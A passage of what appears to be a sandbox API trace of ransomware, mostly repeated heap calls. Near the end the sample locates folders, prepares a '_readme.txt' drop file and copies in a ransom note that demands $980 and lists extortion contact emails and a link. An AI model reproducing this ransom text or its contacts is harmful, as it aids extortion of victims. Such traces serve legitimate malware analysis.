hHeap=0x6a0000) returned 1 [0174.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.591] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.593] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.595] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0174.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.595] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.595] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.595] PathFindFileNameW (pszPath="") returned="" [0174.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.595] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.596] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.596] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.596] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.596] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0174.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.596] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0174.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.598] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact 